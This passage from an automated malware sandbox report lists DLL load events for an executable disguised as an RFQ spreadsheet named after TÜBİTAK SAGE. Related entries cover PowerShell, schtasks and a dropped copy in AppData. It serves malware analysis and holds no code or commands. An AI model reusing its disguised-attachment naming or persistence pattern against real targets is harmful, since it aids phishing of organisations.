                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: ncryptsslp.dll
